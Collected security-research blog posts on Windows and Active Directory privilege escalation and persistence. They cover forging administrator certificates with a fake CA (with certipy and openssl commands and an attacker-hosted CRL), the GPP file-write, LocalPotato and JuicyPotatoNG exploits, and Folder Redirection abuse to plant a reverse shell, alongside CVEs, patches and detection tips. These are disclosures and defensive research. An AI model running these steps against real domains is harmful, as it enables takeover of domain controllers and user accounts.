certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT…
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)

Hmmm, this was somewhat expected. The certificate is not trusted; we probably need to add our fake CA to the trusted certification authorities on the DC. But wait, this means you need high privileges to do this, so we have to abandon the idea of any kind of privilege escalation and instead think of this technique as a possible persistence mechanism. Let’s add it to the DC:

Bad news: when we try to authenticate again, we still get the error message KDC_ERROR_CLIENT_NOT_TRUSTED.

What’s happening? Well, maybe the change to NTAuthCertificates has not been reflected in the DC’s local cache (we updated it as a standard user on a domain-joined PC), which is located under the registry key:

HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates

On the DC, we have only one entry, which corresponds to the legitimate CA. Normally this entry is aligned by the group policy update, so we can either force the update without waiting for the next run (I had some issues as it did not always work, needs more investigation) or run certutil to populate the cache directly:

certutil -enterprise -addstore NTAuth myfakeca.crt

Looks good, so now it should work. But guess what, bad news again! KDC_ERROR_CLIENT_NOT_TRUSTED

What’s still wrong? After some research, I figured out that the problem might be the Certificate Revocation List (CRL), which is checked on a regular basis, or at least the first time a certificate produced by the new CA is used. So we have to configure a CRL distribution point for our fake CA, which luckily can again be done with openssl ;).

First of all, we need to create a ca.conf file. I did this on my Linux box.

[ca]
default_ca = MYFAKECA
[crl_ext]
authorityKeyIdentifier=keyid:always
[MYFAKECA]
unique_subject = no
certificate = ./myfakeca.crt
database = ./certindex
private_key = ./myfakeca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
[myca_policy]
commonName = supplied
stateOrProvinceName = supplied
countryName = optional
emailAddress = optional
organizationName = supplied
organizationalUnitName = optional
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

We need to run some openssl commands to produce the necessary files:

openssl genrsa -out cert.key 2048
#ensure that common name is different from your fake CA
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile myfakeca.crt
openssl ca -config ca.conf -gencrl -keyfile myfakeca.key -cert myfakeca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl
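If you want to sanity-check the result before serving it, the pipeline plus a verification step can be condensed into a self-contained sketch. This uses a minimal ca.conf with example names (the real configuration above carries the extra policy and extension sections), generates an empty CRL, and then verifies that its issuer and signature match the fake CA:

```shell
# self-contained sketch: minimal CA config, empty CRL, then verify it
openssl genrsa -out myfakeca.key 2048
openssl req -x509 -new -nodes -key myfakeca.key -sha256 -days 1024 \
    -subj "/CN=MYFAKECA" -out myfakeca.crt
touch certindex
echo 01 > crlnumber
cat > mini-ca.conf <<'EOF'
[ca]
default_ca = MYFAKECA
[MYFAKECA]
database         = ./certindex
crlnumber        = ./crlnumber
default_md       = sha256
default_crl_days = 30
EOF
openssl ca -config mini-ca.conf -gencrl -keyfile myfakeca.key \
    -cert myfakeca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl
# the issuer must be the fake CA and the signature must verify against it
openssl crl -inform DER -in root.crl -noout -issuer
openssl crl -inform DER -in root.crl -noout -CAfile myfakeca.crt
```

The last command should print “verify OK”; anything else means the DC will reject the CRL anyway, so it is worth catching here.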

Finally, we have our root.crl file; all we need now is to set up a minimalistic HTTP server:

python3 -m http.server 80
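A quick way to confirm the CRL is actually reachable over HTTP before pointing the DC at it. This is a sketch: port 8000 and a placeholder file are used here so it can run unprivileged, while the real setup serves root.crl on port 80:

```shell
# serve the current directory in the background, fetch the CRL, then stop the server
echo "dummy-crl" > root.crl            # placeholder; use the real root.crl
python3 -m http.server 8000 >/dev/null 2>&1 &
SRV=$!
# retry a few times to give the server time to start
for i in 1 2 3 4 5; do
  curl -s -o fetched.crl http://127.0.0.1:8000/root.crl && break
  sleep 1
done
kill $SRV
# the fetched copy must be byte-identical to what we serve
cmp root.crl fetched.crl && echo "CRL is reachable"
```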

In certipy we need to specify our CRL distribution point:

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
certipy auth -pfx administrator_forged.pfx  -dc-ip 192.168.212.21

Bingo! It works: the DC is contacting our CRL distribution point and we are able to authenticate via PKINIT as a domain admin and get his NT hash. Let’s do it with Rubeus:

It worked again! Let’s check if we can access the C$ share on the DC now:

At the end of our experiment, we can draw the following conclusions:

  • Having only write access to NTAuthCertificates is obviously not sufficient to perform a privilege escalation using forged certificates issued by a fake CA for authentication. Worse, you might end up creating client authentication issues by removing the legitimate CA certificate from NTAuthCertificates.
  • You need to add the fake CA to the trusted Certification Authorities and ensure that the local cache is populated on the target Domain Controller.
  • On a machine under your control, you need to set up a CRL distribution point (not sure if this can be skipped).
  • As I mentioned, this is a persistence technique that is not very stealthy: you can, for example, monitor event ID 4768 and verify the Certificate Issuer Name, monitor NTAuthCertificates object changes, etc.

And this is why, just for fun, I called this the “Silver” certificate 😉

EoP via Arbitrary File Write/Overwrite in Group Policy Client “gpsvc” – CVE-2022-37955

By: Decoder
16 February 2023 at 14:11

Summary

A standard domain user can exploit an arbitrary file write/overwrite as NT AUTHORITY\SYSTEM under certain circumstances if a Group Policy “Files preference” is configured. I reported this finding to ZDI, and Microsoft fixed it as CVE-2022-37955.

Versions Affected

Tests (April 06, 2022) were conducted on the following Active Directory setup:

  • Domain computer: Windows 10/Windows 11 & Windows 11 Insider/Windows Server 2022 member server, latest releases and fully patched
  • Domain controller: Windows Server 2016/2019/2022 with Active Directory functional level 2016

Prerequisites                          

A “Files” preference Domain Group Policy has to be configured.

According to Microsoft this policy allows you to:

If such a policy is configured and a standard user has write access to the source and destination folders (a not-so-uncommon scenario), it is possible to perform a file write/overwrite with SYSTEM privileges by abusing symlinks, thus elevating privileges to Administrator/SYSTEM.

A standard user can easily verify the presence and configuration of such a policy by looking for “Files.xml” in the SYSVOL share of the domain controllers.
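For reference, a GPP Files.xml is a small XML document whose Properties element carries the action plus the source and target paths. The sample below is a simplified, hypothetical one (real files also include clsid attributes and more properties), and the two greps pull out the fields an attacker cares about:

```shell
# illustrative (simplified) Files.xml as deployed under SYSVOL\<domain>\Policies\<GUID>\User\Preferences\Files\
cat > Files.xml <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Files>
  <File name="dest.dat" status="dest.dat">
    <Properties action="C" fromPath="c:\sourcedir\source.dat" targetPath="c:\destdir\dest.dat"/>
  </File>
</Files>
EOF
# extract the copy source and destination configured by the policy
grep -o 'fromPath="[^"]*"' Files.xml
grep -o 'targetPath="[^"]*"' Files.xml
```

Action “C” (copy) with user-writable source and destination folders is exactly the situation abused below.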

GPO Setup

To achieve the arbitrary file write exploitation, a new “Files preference” Group Policy has to be created.

The following screenshot shows the setup of the policy:

In this example, the policy will copy the file source.dat from c:\sourcedir to dest.dat in c:\destdir.

The key point here is that these operations are performed without impersonation, running under the SYSTEM context.

Arbitrary File Write                              

Due to the incorrect handling of links created via Windows Object Manager symbolic links, it is possible to exploit this operation and place user-controlled content in any system-protected location.

Exploitation steps

  1. Create the directories if they do not exist and ensure “destdir” is empty
  2. Copy a malicious dll/exe or whatever in c:\sourcedir with the name “source.dat”
  3. Create a symbolic link pointing the destination file c:\destdir\dest.dat to a system-protected directory:
  4. Perform a gpupdate /force

As can be noticed from the previous screenshot, the domain user was able to copy a file into a system-protected directory, controlling both the contents and the name. The screenshot of the “procmon” tool confirms the operations:

Having the possibility to create a user-controlled file in protected directories opens endless privilege escalation possibilities. One of the easiest ways is to overwrite “PrintConfig.dll”, located in “C:\Windows\System32\spool\drivers\x64\3”, with the malicious dll and instantiate the PrintNotify object, which forces the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:

To replicate the findings in this report, Defender was disabled.

Possible causes

A possible root cause can be identified within a function located in gpprefcl.dll which does not properly check for the presence of junction points and symlinks:

The Fix                           

Microsoft enforced the Redirection Guard for the Group Policy Client to prevent a process from following a junction point if it was created with a lower integrity level.


This successfully resolved all the security issues with Group Policy processing, many of which had been reported and partially addressed.

That’s all 😉

LocalPotato – When Swapping The Context Leads You To SYSTEM

By: Decoder
13 February 2023 at 10:23

Here we are again with our (me and @splinter_code) new *potato flavor, the LocalPotato! This was a cool finding so we decided to create a dedicated website 😉

The journey to discovering the LocalPotato began with a hint from our friend Elad Shamir, who suggested examining the “Reserved” field in NTLM Challenge messages for potential exploitation opportunities.

After extensive research, we ended up with the “LocalPotato”, a not-so-common NTLM reflection attack on local authentication allowing arbitrary file read/write. Combining this arbitrary file write primitive with code execution allowed us to achieve a full chain elevation of privilege from user to SYSTEM.

We reported our findings to the Microsoft Security Response Center (MSRC) on September 9, 2022; it was resolved with the January 2023 Patch Tuesday release and assigned CVE-2023-21746.


Local NTLM Authentication

The NTLM authentication mechanism is part of the NTLMSSP (NTLM Security Support Provider), which is supported by the Windows security framework called SSPI (Security Support Provider Interface).
SSPI provides a flexible API for handling authentication tokens and supports several underlying providers, including NTLMSSP, SPNEGO, Kerberos, etc…

The NTLM authentication process involves the exchange of three types of messages (Type 1, Type 2, and Type 3) between the client and the server, processed by the NTLMSSP.
The SSPI authentication handshake abstracts away the details of NTLM and allows for a mechanism-independent means of applying authentication, integrity, and confidentiality primitives.

Local authentication is a special case of NTLM authentication in which the client and server are on the same machine.
The client acquires the credentials of the logged-in user and creates the Type 1 message, which contains the workstation and domain name of the client.
The server examines the domain and workstation information and initiates local authentication if they match.
The client then receives the Type 2 message from the server and checks the presence of the “Negotiate Local Call” flag to determine if the security context handle is valid.
If it is, the default credentials are associated with the server context, and the resulting Type 3 message is empty.
The server then verifies that the security context is bound to a user, and if so, authentication is complete.

In summary, during local authentication, the “Reserved” field which is usually set to zero for non-local authentication in the NTLM type 2 message, will reference the local server context handle that the client should associate to.

In the above figure, we have highlighted the Reserved field containing the upper value of the context handle.

The Logic Bug

NTLM authentication through SSPI is often misunderstood as involving direct mutual authentication between the client and server. However, in reality, the local authenticator (LSASS) is always involved, acting as the intermediary between the two.
It is responsible for creating the messages, checking the identity permissions, and generating the proper tokens. 

The objective of our research was to intercept a local NTLM authentication as a non-privileged local or domain user, and “swap” the contexts (NTLM “Reserved” field) with that of a privileged user (e.g. by coercing an authentication). 

This would allow us to authenticate against a server service with these credentials, effectively exchanging the identity of our low-privileged user with a more privileged entity like SYSTEM. If successful, this would indicate that there are no checks in place to validate the Context exchanged between the two parties involved in the authentication.

The attack flow is as follows:

  • Coerce the authentication of a privileged user against our server.
  • Initiate an NTLM authentication of our client against a server service.
  • Intercept the context “B” (Reserved bytes) of the NTLM Type 2 message coming from the server service where our unprivileged client is trying to authenticate.
  • Retrieve the context “A” (Reserved bytes) of the NTLM Type 2 message produced by our server when the privileged client tries to authenticate.
  • Swap context A with B so that the privileged client will authenticate against the server service on behalf of the unprivileged client and vice versa.
  • Retrieve both NTLM Type 3 empty response messages and forward them in the correct order to complete both authentication processes.
  • As a result of the context swap, the Local Security Authority Subsystem (LSASS) will associate context B with the privileged identity and context A with the unprivileged identity. This results in the swap of contexts, allowing our malicious client to authenticate on behalf of the privileged user.

Below is a graphical representation of the attack flow:

To validate our assumptions about the context swap attack, we set up a custom scenario.
In our experiment, we used two socket servers and two socket clients to authenticate via NTLM with different users and exchange each other’s “context”.
Both parties were negotiating the NTLM authentication over a socket through SSPI.
In particular the clients with two calls to InitializeSecurityContext() and the servers with two calls to AcceptSecurityContext().

After some adjustments, we succeeded in swapping identities and were able to trick LSASS into associating the context with the “wrong” server.

To exploit this in a real-world scenario, we then had to find a useful trigger for coercing a privileged client and an appropriate server service.

The Triggers for coercing a privileged client

Based on our previous research, we identified two key triggers for coercing a privileged client: the BITS service attempting to authenticate as the SYSTEM user via HTTP on port 5985 (WinRM), and authenticated RPC/DCOM privileged user calls.

RogueWinRM is a technique that takes advantage of the BITS service’s attempt to authenticate as the SYSTEM user via HTTP on port 5985. Since this port is not enabled by default on Windows 10/11, it provides an opportunity to implement a custom HTTP server that can capture the authentication flow. This allows us to obtain SYSTEM-level authentication.

RemotePotato0 is a method for coercing privileged authentication on a target machine by taking advantage of standard COM marshaling. In our scenario, we discovered three interesting default CLSIDs that authenticate as SYSTEM:

  1. CLSID: {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
    The ActiveX Installer Service “AxInstSv” is available only on Windows 10/11.
  2. CLSID: {854A20FB-2D44-457D-992F-EF13785D2B51}
    The Printer Extensions and Notifications Service “PrintNotify” is available on Windows 10/11 and Server 2016/2019/2022.
  3. CLSID: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}
    The Universal Print Management Service “McpManagementService” is available on Windows 11 and Server 2022.

By leveraging one of these triggers we could have the proper privileged identity to abuse.

Exploiting a server service 

Initially, we tried to find a privileged candidate for our server service by examining the exposed RPC services, such as the Service Control Manager. However, we encountered a problem with local authentication to RPC services, as it is not possible to perform any reflection or relay attacks due to mitigations in the RPC runtime library (rpcrt4.dll).

As explained in this blog post by James Forshaw, Microsoft has added a mitigation in the RPC runtime to prevent authentication relay attacks from being successful.
This is done in “SSECURITY_CONTEXT::ValidateUpgradeCriteria()” by checking if the authentication for an RPC connection was from the local system, and if so, setting a flag in the security context. The server will then reject the RPC call if this flag is set, before any code is called in the server. The only way to bypass this check is to either have authentication from a non-local system or have an authentication level of RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or higher, which requires knowledge of the session key for signing or encryption, which of course effectively mitigates any relaying attempts.

Next, we turned our attention to the SMB server, with the goal of performing an arbitrary file write with elevated privileges. 

The only requirement was that the SMB server should not require signing, which is the default for servers that are not Domain Controllers. 

However, we found that the SMB protocol also has some mitigations in place to prevent cross-protocol reflection attacks. 

This mitigation, also referred to as CVE-2016-3225, was released to address the WebDAV->SMB relaying attack scenario.

Basically, it requires the use of the SPN “cifs/127.0.0.1” when initializing local authentication through InitializeSecurityContext() for connecting to the SMB server, even for authentication protocols other than Kerberos, such as NTLM.

The main idea behind this mitigation is to prevent relaying local authentication between two different protocols, which would result in an SPN mismatch in the authenticator and ultimately lead to an access denied error.

According to James Forshaw’s article “Windows Exploitation Tricks: Relaying DCOM Authentication“, it is possible to trick a privileged DCOM client into using an arbitrary Service Principal Name (SPN) to forge an arbitrary Kerberos ticket.
While this applies to Kerberos, it turns out that it can also affect the SPN setting in an NTLM authentication.
For this reason we chose to use the RPC/DCOM trigger for coercing a privileged client because we could return an arbitrary SPN in the binding strings of the Oxid resolver, thus bypassing the SMB anti-reflection mechanism.
All we needed to do was to set an SPN of “cifs/127.0.0.1” in the originating privileged client, which was not a problem thanks to our trigger:

In the end, we were able to write an arbitrary file with SYSTEM privileges and arbitrary contents.
The network capture of the SMB packets shows us successfully authenticating to the C$ share as the SYSTEM user and overwriting the file PrintConfig.dll:

The POC

Creating a proof of concept for LocalPotato was a challenging task as it required writing SMB packets and sending them through the loopback interface for low-level NTLM authentication, accessing the local share, and finally writing a file.
We relied on Wireshark captures and Microsoft’s MS-SMB2 protocol specifications to complete the process. After multiple tests and code adjustments, we were finally successful.


To simplify the attack chain, we opted to eliminate the redirection to a non-Windows machine listening on port 135 and instead have the fake oxid resolver running on the Windows victim machine, so that the Potato trigger is local and the whole attack chain is fully local.

Just like we did in JuicyPotatoNG, we leveraged SSPI hooks to manipulate the NTLM messages coming to our COM server from the privileged client, enabling the context swapping.

There are various methods to weaponize an arbitrary file write into code execution as SYSTEM, such as using an XPS Print Job or NetMan DLL Hijacking. So you are free to combine the LocalPotato primitive with what you prefer 😉

Converting an arbitrary file write into EoP is relatively straightforward.
In our case, we utilized the McpManagementService CLSID on a Windows 2022 server, overwrote the printconfig.dll library, and instantiated the PrintNotify object.
This forced the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:

The LocalPotato POC is available at → https://github.com/decoder-it/LocalPotato

The Patch

The main focus of the analysis was the function SsprHandleChallengeMessage(), which handles NTLM challenges. 

The LocalPotato vulnerability was found in the NTLM authentication scheme. To locate the source of the vulnerability, we conducted a binary diff analysis of msv1_0.dll, the security package loaded into LSASS to handle all NTLM-related operations:

We observed the addition of a new check for the enabled feature “Feature_MSRC74246_Servicing_NTLM_ServiceBinding_ContextSwapping” when authentication occurs:

The check introduced by Microsoft ensures that if the ISC_REQ_UNVERIFIED_TARGET_NAME flag is set and an SPN is present, the SPN is set to NULL. 

This change effectively addresses the vulnerability by disrupting this specific exploitation scenario. 

The SMB anti-reflection mechanism checks for the presence of a specific SPN, such as “cifs/127.0.0.1”, to determine whether to allow or deny access. With the patch in place, a NULL value will be found, thus denying the authentication.
It’s important to note that the ISC_REQ_UNVERIFIED_TARGET_NAME flag is passed and used by the DCOM privileged client, but prior to this patch, it was not taken into consideration for NTLM authentication.

Microsoft has released patches for supported versions of Windows, but don’t worry if you have an older version. 0patch provides fixes for LocalPotato for unsupported versions as well!

Conclusion

In conclusion, the LocalPotato vulnerability highlights the weaknesses of the NTLM authentication scheme in local authentication. 

Microsoft has resolved the issue with the release of the patch CVE-2023-21746, but this fix may just be a workaround as detecting forged context handles in the NTLM protocol may be difficult.

It is important to note that this type of attack is not specific to the SMB or RPC protocols, but rather a general weakness in the authentication flow.
Other protocols that use NTLM as authentication method may still be vulnerable, provided exploitable services can be found.

What’s next?

Well, to be honest, we ran out of ideas. But for sure, if we find something new it will be the “Golden Potato”!

Acknowledgments

Our thanks go to these two top security researchers:

  • Elad Shamir (@elad_shamir) who gave us the initial idea and with whom we constantly discussed and debated this topic

  • James Forshaw (@tiraniddo) who gave us useful hints when everything seemed to be lost

Giving JuicyPotato a second chance: JuicyPotatoNG

By: Decoder
21 September 2022 at 17:07

Well, it’s been a long time since our beloved JuicyPotato was published. In the meantime, things changed and got fixed (backported also to Win10 1803/Server 2016), leading to the glorious end of this tool, which made it possible to elevate to SYSTEM by abusing impersonation privileges on Windows systems.

With Juicy2 it was somehow possible to circumvent the protections MS implemented to stop this evil abuse, but there were some constraints, for example requiring an external non-Windows machine redirecting the OXID resolution requests.

The subset of CLSIDs to abuse was very restricted (most of them would give us an Identification token); in fact, it worked only on Windows 10/11 versions with the “ActiveX Installer Service”. The “PrintNotify” service was also a good candidate (enabled also on Windows Server versions) but required membership in the “INTERACTIVE” group, which in fact limited the abuse from service accounts.

When James Forshaw published the post about relaying Kerberos DCOM authentication which is also an evolution of our “RemotePotato0” we reconsidered the limitation given that he demonstrated that it was possible to do everything on the same local machine.

The “INTERACTIVE” constraint could also be easily bypassed as demonstrated by @splinter_code’s magic RunasCs tool.

Putting all the pieces together was not that easy and I have to admit I’m really lazy in coding, so I asked my friend (and coauthor in the *potato saga) @splinter_code for help. He obviously accepted the engagement 🙂

How we implemented it

The first thing we implemented was Forshaw’s “trick” for resolving Oxid requests to a local COM server on a randomly selected port.
We spoofed the image filename of our running process to “System” to bypass the Windows firewall restriction (if enabled) and decided to use port 10247 as the default port, given that in our tests this port was generally available to a low-privileged local user.

When we want to activate a COM object we need to take into consideration the security permissions configured. In our case the PrintNotify service had the following Launch and Activation permission:

Given that the INTERACTIVE group was needed for activating the PrintNotify object (identified by the CLSID parameter), we used the following “trick”:

When using the LogonUser() API call with Logon Type 9 (NewCredentials), LSASS will build a copy of our token and add the INTERACTIVE SID along with others, e.g. the SID of the newly created logon session. Because we created this token through LogonUser() and explicit credentials, we don’t need impersonation privileges to impersonate it. Of course, the credentials are fake, but that doesn’t matter, as they will only be used over the network while the original caller identity is used locally.

Last but not least, we needed to capture the authentication in order to impersonate the SYSTEM user. The most obvious solution was to write our own RPC server listening on port 10247 and then simply call RpcImpersonateClient().
However, this was not possible. That’s because when we register our RPC server binding information through RpcServerUseProtseqEp(), the RPC runtime will bind to the specified port and this port will be “busy” for others that try using it.
We could have implemented some hack to enumerate the socket handles in our process and hijack the socket, but that was an unnecessary heavy load of code.

So we decided to implement an SSPI hook on AcceptSecurityContext() function which would allow us to intercept the authentication and get the SYSTEM token to impersonate:

Using an SSPI hook instead of relying on RpcImpersonateClient() has the advantage of making this exploit work even when holding only SeAssignPrimaryTokenPrivilege. As you may know, RpcImpersonateClient() requires your process to hold SeImpersonatePrivilege, so that would have added an unnecessary limitation.

The JuicyPotatoNG TOOL

The source code of JuicyPotatoNG, written in Visual Studio 2019 C++, can be downloaded here.

The Port problem

As mentioned, we chose the default COM server port 10247, but sometimes you can run into a situation where the port is not available. The following simple PowerShell script will help you find the available ports; just choose one not already in use and you’re done.
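The idea behind such a script is simply to list the listening ports and print candidates that are free (on Windows, for example, by querying Get-NetTCPConnection -State Listen). Below is the same logic sketched for a Unix shell; illustrative only, and the port range is an example:

```shell
# print candidate COM-server ports in 10240-10260 that are not already listening
for p in $(seq 10240 10260); do
  # ss -Htln: no header, tcp, listening sockets, numeric; column 4 is local addr:port
  if ! ss -Htln 2>/dev/null | awk '{print $4}' | grep -q ":$p\$"; then
    echo "$p available"
  fi
done
```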

Countermeasures

Be aware, this is not considered by MS a “Security Boundary” violation. Abusing impersonation privileges is an expected behavior 😉

So what can we do in order to protect ourselves?

First of all, service accounts and accounts with these privileges should be protected by strong passwords and strict access policies; in the case of service accounts, “Virtual Service Accounts” or “Group Managed Service Accounts” should be used. You could also consider removing unnecessary privileges, as described in one of my posts, but this is not totally secure either…

In this particular case, just disabling the “ActiveX Installer Service” and the “Print Notify Service” will inhibit our exploit (and has no serious impact). But remember, there could be third-party CLSIDs with SYSTEM impersonation too…

Conclusions

This post is the demonstration that you should never give up and always push the limits one step further 🙂 … and we have other *potato ready, so stay tuned!

Special thanks to the original “RottenPotato” developers, Giuseppe Trotta, and as usual to James Forshaw

That’s all 😉

Update

It seems that Microsoft “fixed” the INTERACTIVE trick and JuicyPotatoNG stopped working. But guess what, there is another CLSID which does not require the INTERACTIVE group and impersonates SYSTEM: {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}

Runs only on win11/2022…

Authors of this post: @decoder_it, @splinter_code

Group Policy Folder Redirection CVE-2021-26887

By: Decoder
27 April 2022 at 17:30

Two years ago (March 2020), I found this sort of “vulnerability” in the Folder Redirection policy and reported it to MSRC. They acknowledged it with CVE-2021-26887 even if they did not really fix the issue (“folder redirection component interacts with the underlying NTFS file system has made this vulnerability particularly challenging to fix”). The proposed solution was reconfiguring Folder Redirection with Offline Files and restricting permissions.

I completely forgot about this case until a few days ago, when I came across my report and decided to publish my findings (don’t expect anything very sophisticated).

There is also an “important” update at the end.. so keep on reading 🙂

Summary

If “Folder Redirection” has been enabled via Group Policy and the redirected folders are hosted on a network share, it is possible for a standard user who has access to this file server to access other users’ folders and files (information disclosure) and eventually perform code execution and privilege escalation.

Prerequisites

  1. A Domain User Group Policy with “Folder Redirection” has to be configured.
  2. A standard local or domain user has to be able to log in on the file server configured with the folder redirection shares (RDP, WinRM, SSH, …)
  3. There have to be domain users who will log on for the first time or will have the folder redirection policy applied for the first time


Steps to reproduce

In this example I used 3 VM’s:

  1. Windows 2019 Server acting as Domain Controller
  2. Windows 2019 Member Server acting as File Server
  3. Windows 10 domain joined client

On the domain controller I create a “Folder Redirection” policy. In my example, I’m going to use the “Default Domain Policy” and redirect two folders, the user’s “Documents” and “AppData” folders, to a network share located on server “S01”.

The policy can be found in the SYSVOL share of the DC’s:

The folder redirected share is accessible via network path \\S01\users$. The permissions on this folder have been configured on server “S01” according to MS document: https://docs.microsoft.com/en-us/windows-server/storage/folder-redirection/deploy-folder-redirection

In my case, the policy will be applied to the “S01\Users” group, because this group also contains the “Domain Users” group.

Each time a domain user logs in to the domain, the Documents and AppData folders (in this case) are saved on the network share. If it is the first time the user logs in, the necessary directories are created under the share with strict permissions:

One could think of creating the necessary directories before the domain user logs in, granting himself and the domain user full control, and then accessing this private folder and its data afterwards.

This is not possible, because during the first logon, if the folder already exists, a strict check on ownership and permissions is made, and if they don’t match the folder will not be used. (I verified this with “procmon”.)

But if the shared directory has a valid owner and permissions, no further permission checks are made during subsequent logins, and this is a potential security issue.

How can I accomplish this? This is what I will do:

As a standard local/domain user, I log in on the server where the shares are hosted (I know this is not so common…).

I will create a “junction” for a new user who has not logged in to the domain yet or has not had the Folder Redirection policy applied yet. (Finding “new” users is a really easy task for a standard domain user, so I won’t explain it.) In my case, for example, “domainuser3”.
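The junction itself can be created with the built-in mklink; a sketch with hypothetical paths (assuming the local folder D:\Shares\Users backs the \\S01\users$ share and C:\Temp\loot is a folder the attacker controls):

```powershell
# Hypothetical paths: the "pre-created" profile folder actually points into attacker-controlled territory
cmd /c mklink /J "D:\Shares\Users\domainuser3" "C:\Temp\loot"
```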

Now I have to wait for domainuser3 to log in from his Windows 10 client (in my case).

The Folder Redirection policy has been applied and permissions are set on the folders.

But as we can see on the file server S01, my junction point has been followed too; the real location of the folders is here:

Now, all the malicious user “localuser” has to do is wait for domainuser3 to log off, delete the junction, and create the new folders under the original share:

… and then set the permissions (on Documents and AppData in our case) so that “everyone” is granted full control:
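Setting those permissions from the command line could look like this icacls sketch (paths hypothetical, matching the example above):

```powershell
# (OI)(CI)F = inherit to files and subfolders, Full control
icacls "D:\Shares\Users\domainuser3\Documents" /grant "Everyone:(OI)(CI)F"
icacls "D:\Shares\Users\domainuser3\AppData"   /grant "Everyone:(OI)(CI)F"
```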

Given that in my case the “AppData” folder is also redirected, we could place a “malicious” program in the user’s Startup folder which will then be executed at login (for example a reverse shell)

At this point, “localuser” has to wait for the next login of “domainuser3”

And will get a shell impersonating domainuser3 (imagine if it was a high privileged user):

Of course, he will be able to access the Documents folder with full control permissions:

Conclusions:

Even if the pre-conditions are not so “common”, this vulnerability could easily lead to information disclosure and EoP.

Update

So much for the report, but when I re-read the mitigations suggested by MS, something was not so clear. The first time the user logs in, the necessary security checks are performed, so why did they say that it was not possible to fix? All they had to do was perform these checks not only at the first logon, right?

My best guess is that if the profile, or more precisely the registry entry HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\<user_sid>, is not found, the checks are performed; otherwise they are skipped.

A quick test demonstrated that I was right: after the first logon, I deleted the registry entry and the security checks were performed again.

Maybe the answer is in fdeploy.dll, for example in CEngine::_ProcessFRPolicy; I need to investigate further… or maybe I’m missing something, but this exercise is left to the reader.

That’s all 😉

A not-so-common and stupid privilege escalation

By: Decoder
25 April 2022 at 15:26

Some time ago, I was doing a Group Policy assessment in order to check for possible misconfigurations. Apart from running the well-known tools, I usually take a look at the shared SYSVOL policy folder. The SYSVOL folder is readable by all domain users and domain computers. At some point my attention was caught by the “Files.xml” file located under a specific user policy:

These settings were related to the “Files” preference of the Group Policy Preferences, running under the user configuration.

According to Microsoft this policy allows you to:

In this case, an exe file (CleanupTask.exe) was copied from a shared folder to a specific location under the “Program Files” folder (the folder names are invented for confidentiality reasons). The “CleanupTask” executable was run by the Windows Task Scheduler every hour under the SYSTEM user.

The first question was: why not run it under the computer configuration? Short answer: only some users had this “custom application” installed, which needed to be replaced, so the policy was filtered for a particular user group, in our case the “CustomApp” group, and luckily my user “user1” was a member of this group.

The policy was executed without impersonating the user (so under the SYSTEM context), otherwise I would have found an entry “userContext=1” in the XML file. This was necessary because a standard user cannot write to %ProgramFiles%.

In addition, the policy was run only once (FilterRunOnce), which prevented the file from being copied again each time the user logged in.

To sum it up this was the policy configuration from the DC perspective:

Now that I had a clear vision of this policy, I took a look at the shared hidden folder… and guess what? It was writable by domain users, a really dangerous misconfiguration…

I think you already got it: I could place an evil executable (reverse shell, add my user to local admins and so on) in this directory, perform a gpupdate /force, which would copy the evil program to “Program Files\CustomApp\Maintenance”, and then wait for the CleanupTask to execute…

But I still had a problem: this policy was applied only once, and in my case I was already too late… so no way? Not at all. The evidence that the policy has already been executed is stored in a particular location in the Windows registry under the “Current User” hive, which we can modify…

All I needed to do was delete the GUID referring to the filter ID of the group policy, run gpupdate /force again, and perform all the nasty things…

Misconfigurations in Group Policies, especially those involving file operations, can be very dangerous, so publish them only after an extremely careful review 😉

Hands off my (MS) cloud services!

By: Decoder
6 April 2021 at 15:08

Ok, this title is deliberately provocative, but the goal of this post is just to share some (as usual) “quick & dirty” tricks with all of you concerned about securing your Microsoft’s O365/Exchange/AzureAD online instances.

If you are facing the problem of having one or more services exposed on the Microsoft cloud and want to have a clearer view of the security configurations, it’s not easy to find the right path, even though there are a ton of online resources about this subject.

Since I’m definitely not an expert, I often asked my friend @anformato for help and he always gave me useful tips. So when I later proposed that we write a post together on this topic in order to share “real life” experiences, he enthusiastically accepted.

In this first part we will talk about the Azure Active Directory “ecosystem”.

So let’s start from the beginning!

Azure Active Directory

Probably you have your on premise Active Directory Domain/Forest replicated with your online Azure AD instance, right?

Don’t replicate everything

You should carefully evaluate which objects you really need to synchronize and avoid replicating everything. Remember “less is more”: the more you replicate, the larger the possible attack surface.

Synchronize only the necessary objects (like users) which really need to access online services. It’s also good practice not to replicate administrators and other highly privileged users. Azure AD admins should not be shared with on-premises admins and vice versa (more on this in the dedicated chapter).

Replication can be easily configured with the “Azure AD Connect” tool:

Remember to perform this task before the first synchronization, otherwise it will be painful to remove unnecessary objects replicated to Azure AD (I had to open a case with MS support…)

Limit Administrative Access

Reducing the number of persistent Global Administrators is really a good practice.
